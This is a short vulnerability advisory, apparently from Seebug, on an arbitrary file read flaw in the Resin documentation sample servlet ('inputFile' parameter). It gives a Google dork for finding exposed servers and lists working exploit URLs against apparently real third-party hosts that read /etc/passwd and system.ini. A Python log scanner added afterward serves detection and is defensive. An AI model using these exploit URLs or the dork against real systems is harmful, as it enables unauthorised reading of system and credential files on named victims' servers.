resin-doc conference management system arbitrary file read vulnerability

2016-03-23T00:00:00
ID SSV:91151
Type seebug
Reporter fly520
Modified 2016-03-23T00:00:00

Description

http://..***/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=

The inputFile parameter allows arbitrary files to be read.

<https://www.google.com/?gws_rd=ssl#q=inurl:jndi-appconfig%2Ftest>

A Google search turns up many more.

For example:

<http://www.comatek.ru:8080/resin-doc/examples/jndi-appconfig/test?inputFile=C:\Windows\system.ini>

<http://www.stationery.frontrunnerpro.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd>

<http://ns1.soccerstat.net/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd>
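Requests to this servlet leave a recognizable trace in web access logs. The Python script below is an added example, not part of the original advisory: it flags log lines that reach the `jndi-appconfig/test` path under `/resin-doc/` and reports the decoded `inputFile` value. The combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Servlet path from the advisory; both prefixes seen there end the same way.
SERVLET_RE = re.compile(r"/resin-doc/.*/jndi-appconfig/test$", re.IGNORECASE)

def fully_unquote(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252F) up to a fixed depth."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return (kind, requested_file) for a log line, or None if unrelated."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not SERVLET_RE.search(fully_unquote(url.path)):
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    if "inputFile" not in params:
        return ("servlet-reachable", None)  # sample app is deployed and was probed
    return ("file-read", fully_unquote(params["inputFile"][0]))

def scan(lines):
    """Return (line_number, kind, requested_file) for every matching line."""
    return [(n, *hit) for n, line in enumerate(lines, 1) if (hit := classify(line))]

# Constructed sample log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [23/Mar/2016:10:00:01 +0000] "GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd HTTP/1.1" 200 1532',
    '192.0.2.11 - - [23/Mar/2016:10:00:05 +0000] "GET /resin-doc/examples/jndi-appconfig/test?inputFile=C%3A%5CWindows%5Csystem.ini HTTP/1.1" 200 219',
    '192.0.2.12 - - [23/Mar/2016:10:00:09 +0000] "GET /resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=%252Fetc%252Fpasswd HTTP/1.1" 200 1532',
    '192.0.2.13 - - [23/Mar/2016:10:00:12 +0000] "GET /resin-doc/resource/tutorial/jndi-appconfig/test HTTP/1.1" 200 800',
    '192.0.2.14 - - [23/Mar/2016:10:00:15 +0000] "GET /index.jsp?inputFile=report.txt HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for n, kind, path in scan(SAMPLE_LOG):
        print(f"line {n}: {kind} {path or ''}")
```

A `servlet-reachable` hit without `inputFile` still matters: it shows the resin-doc sample application is deployed on the host and being requested.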